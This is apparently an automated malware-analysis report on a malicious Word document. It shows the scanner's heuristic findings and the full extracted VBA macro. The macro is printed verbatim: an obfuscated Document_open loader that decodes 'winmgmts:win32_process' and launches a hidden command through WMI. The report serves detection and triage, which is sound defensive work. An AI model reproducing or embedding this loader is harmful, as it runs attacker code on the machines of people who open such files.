MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-10034158-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set I__edah1cnhbwipsa = VBA.GetObject(Oxy0kbm7s8vu) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8432 bytes |
SHA-256: 1604f6e2e05bd78747d6f8ed2ec7d90b3ad25242821a34c9eac132c9f36477a5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
81 of 151 identifiers look randomly generated (e.g. 'Mphv6i7r5jq4bblwie'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Q7ihmehyptms2ng"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Bhp0aqfrkyw21
End Sub
Attribute VB_Name = "M4utal1sd5n14"
Attribute VB_Name = "Gkl7fm22d4p8qo1c_"
Function Bhp0aqfrkyw21()
GoTo ggngAD
Const yLCgDcc As String = "A"
Const reeuG As String = ","
Const zPTmF As String = "*high*,*critic*"
Dim TDrnH As Range: Set TDrnH = Array((yLCgDcc), Target)
If TDrnH Is Nothing Then
End If
Dim tqyOHM() As String: tqyOHM = Split(zPTmF, reeuG)
ggngAD:
skuwd = W0wvd14be68 + Q7ihmehyptms2ng _
. _
Content + Fzab301r4eg2
GoTo hHxBa
Const AcKvFGGG As String = "A"
Const itriFjHzL As String = ","
Const GqroGA As String = "*high*,*critic*"
Dim EwbbYE As Range: Set EwbbYE = Array((AcKvFGGG), Target)
If EwbbYE Is Nothing Then
End If
Dim ejjHwI() As String: ejjHwI = Split(GqroGA, itriFjHzL)
hHxBa:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
R3qm3f52jnc5jc_kf = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo JsXSHPDHf
Const rnkAeDHKV As String = "A"
Const CzLpIAY As String = ","
Const otABk As String = "*high*,*critic*"
Dim KMoOZC As Range: Set KMoOZC = Array((rnkAeDHKV), Target)
If KMoOZC Is Nothing Then
End If
Dim RxAnNIODO() As String: RxAnNIODO = Split(otABk, CzLpIAY)
JsXSHPDHf:
U18pdqz11u1selluhb = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo rYbUHH
Const beEjBCIB As String = "A"
Const ZUaSM As String = ","
Const USpQJnFEE As String = "*high*,*critic*"
Dim JEqxI As Range: Set JEqxI = Array((beEjBCIB), Target)
If JEqxI Is Nothing Then
End If
Dim TdoGFcFC() As String: TdoGFcFC = Split(USpQJnFEE, ZUaSM)
rYbUHH:
Mphv6i7r5jq4bblwie = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo LFCPgEIvS
Const zOtyHg As String = "A"
Const WunTAE As String = ","
Const PUivEGEF As String = "*high*,*critic*"
Dim wgArQBJLB As Range: Set wgArQBJLB = Array((zOtyHg), Target)
If wgArQBJLB Is Nothing Then
End If
Dim hxpGG() As String: hxpGG = Split(PUivEGEF, WunTAE)
LFCPgEIvS:
Owb53_mokkxn21tskl = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo hQzUsiZ
Const gyEzHlHH As String = "A"
Const OOjdY As String = ","
Const wstyY As String = "*high*,*critic*"
Dim IMPEHFuW As Range: Set IMPEHFuW = Array((gyEzHlHH), Target)
If IMPEHFuW Is Nothing Then
End If
Dim RcFwUDqWD() As String: RcFwUDqWD = Split(wstyY, OOjdY)
hQzUsiZ:
Rg52lmivj3ydcurivj = Mphv6i7r5jq4bblwie + Owb53_mokkxn21tskl + U18pdqz11u1selluhb + mjbBYHhbs + R3qm3f52jnc5jc_kf
GoTo xIxrBGky
Const WpUaWIMo As String = "A"
Const CEEUXGpUi As String = ","
Const xUgQGBG As String = "*high*,*critic*"
Dim vZmBC As Range: Set vZmBC = Array((WpUaWIMo), Target)
If vZmBC Is Nothing Then
End If
Dim FjEjXGBH() As String: FjEjXGBH = Split(xUgQGBG, CEEUXGpUi)
xIxrBGky:
Oxy0kbm7s8vu = Kez1gv_r2ix6(Rg52lmivj3ydcurivj)
GoTo pmqlJnIaA
Const IrroIAjC As String = "A"
Const PUVbG As String = ","
Const dzTGHHqot As String = "*high*,*critic*"
Dim bmIBGb As Range: Set bmIBGb = Array((IrroIAjC), Target)
If bmIBGb Is Nothing Then
End If
Dim wdHTEGCLM() As String: wdHTEGCLM = Split(dzTGHHqot, PUVbG)
pmqlJnIaA:
Set I__edah1cnhbwipsa = VBA.GetObject(Oxy0kbm7s8vu)
GoTo brzGCN
Const dVnGYC As String = "A"
Const cuZpIJ As String = ","
Const NilSuVIgD As String = "*high*,*critic*"
Dim KMRoDHY As Range: Set KMRoDHY = Array((dVnGYC), Target)
If KMRoDHY Is Nothing Then
End If
Dim YXOfwAH() As String: YXOfwAH = Split(NilSuVIgD, cuZpIJ)
brzGCN:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Kez1gv_r2ix6(mxkikw)
GoTo IJbKBIm
Const WZJsAtYE As String = "A"
Const XctmsIAUG As String = ","
Const DkEXbhP As String = "*high*,*critic*"
Dim lcAnp As Range: Set lcAnp = Array((WZJsAtYE), Target)
If lcAnp Is Nothing Then
End If
Dim frMyD() As String: frMyD = Split(DkEXbhP, XctmsIAUG)
IJbKBIm:
I__edah1cnhbwipsa.Create pqwm, K1ew1exp5knklujmz, Ejniyowb_7hqnwa82
GoTo LaNHCAEo
Const exceDEMA As String = "A"
Const ldjHJE As String = ","
Const IrcJGHm As String = "*high*,*critic*"
Dim WLFRBJI As Range: Set WLFRBJI = Array((exceDEMA), Target)
If WLFRBJI Is Nothing Then
End If
Dim vtrTREh() As String: vtrTREh = Split(IrcJGHm, ldjHJE)
LaNHCAEo:
End Function
Function Kez1gv_r2ix6(Ibo15ic8a8wo_se)
On Error Resume Next
GoTo bOvkG
Const aJVXECIJ As String = "A"
Const yJKQic As String = ","
Const ZtmGBgJD As String = "*high*,*critic*"
Dim AijQHLC As Range: Set AijQHLC = Array((aJVXECIJ), Target)
If AijQHLC Is Nothing Then
End If
Dim hWedHAAE() As String: hWedHAAE = Split(ZtmGBgJD, yJKQic)
bOvkG:
Cd7m4b5k04eoeddu5 = Ibo15ic8a8wo_se
GoTo bYNxG
Const tbNzLXX As String = "A"
Const WGveDbAIF As String = ","
Const EraFEW As String = "*high*,*critic*"
Dim FLzwI As Range: Set FLzwI = Array((tbNzLXX), Target)
If FLzwI Is Nothing Then
End If
Dim zoiajCSWD() As String: zoiajCSWD = Split(EraFEW, WGveDbAIF)
bYNxG:
Px0mn5fhczsxnllt = Agah81tjjqyo(Cd7m4b5k04eoeddu5)
GoTo FgLbW
Const pvhdmCCB As String = "A"
Const fZoiLEYz As String = ","
Const KpIfFyJ As String = "*high*,*critic*"
Dim PUGeDFCy As Range: Set PUGeDFCy = Array((pvhdmCCB), Target)
If PUGeDFCy Is Nothing Then
End If
Dim YZukJR() As String: YZukJR = Split(KpIfFyJ, fZoiLEYz)
FgLbW:
Kez1gv_r2ix6 = Px0mn5fhczsxnllt
GoTo iKfGA
Const sKSrjBC As String = "A"
Const EkiVXJ As String = ","
Const DnHAlGFJQ As String = "*high*,*critic*"
Dim bOnLHRB As Range: Set bOnLHRB = Array((sKSrjBC), Target)
If bOnLHRB Is Nothing Then
End If
Dim BdzZHC() As String: BdzZHC = Split(DnHAlGFJQ, EkiVXJ)
iKfGA:
End Function
Function Agah81tjjqyo(Gu79j7w403p16qz)
GoTo REeUEbHq
Const xaudGBl As String = "A"
Const iwunAkIB As String = ","
Const GGKbvJJI As String = "*high*,*critic*"
Dim GZvnH As Range: Set GZvnH = Array((xaudGBl), Target)
If GZvnH Is Nothing Then
End If
Dim IaHNsjlI() As String: IaHNsjlI = Split(GGKbvJJI, iwunAkIB)
REeUEbHq:
GoTo PMCGBy
Const PGooG As String = "A"
Const bYNpHSgkG As String = ","
Const mZhRCBE As String = "*high*,*critic*"
Dim zqJSGT As Range: Set zqJSGT = Array((PGooG), Target)
If zqJSGT Is Nothing Then
End If
Dim KFchF() As String: KFchF = Split(mZhRCBE, bYNpHSgkG)
PMCGBy:
GoTo vPfUDmBA
Const ypMqJ As String = "A"
Const eqBNQIHC As String = ","
Const xATDEDCo As String = "*high*,*critic*"
Dim hFPYGcG As Range: Set hFPYGcG = Array((ypMqJ), Target)
If hFPYGcG Is Nothing Then
End If
Dim FTqWXFQ() As String: FTqWXFQ = Split(xATDEDCo, eqBNQIHC)
vPfUDmBA:
Agah81tjjqyo = Replace(Gu79j7w403p16qz, "ns w" + "u db nd", Nhylfrtr9zy0)
GoTo CjvOCJq
Const KbvQFR As String = "A"
Const GTYfmGBb As String = ","
Const JOmdaG As String = "*high*,*critic*"
Dim sMJmXA As Range: Set sMJmXA = Array((KbvQFR), Target)
If sMJmXA Is Nothing Then
End If
Dim nDcQBkMD() As String: nDcQBkMD = Split(JOmdaG, GTYfmGBb)
CjvOCJq:
GoTo PFFIDVjq
Const hvDTWiR As String = "A"
Const gqbeGNF As String = ","
Const jTblmIr As String = "*high*,*critic*"
Dim rezOFgH As Range: Set rezOFgH = Array((hvDTWiR), Target)
If rezOFgH Is Nothing Then
End If
Dim qxxGEz() As String: qxxGEz = Split(jTblmIr, gqbeGNF)
PFFIDVjq:
GoTo GcAUmNwDY
Const XNBzCL As String = "A"
Const pVVsBCF As String = ","
Const JPzVCPa As String = "*high*,*critic*"
Dim DNFZJ As Range: Set DNFZJ = Array((XNBzCL), Target)
If DNFZJ Is Nothing Then
End If
Dim awfAvBE() As String: awfAvBE = Split(JPzVCPa, pVVsBCF)
GcAUmNwDY:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.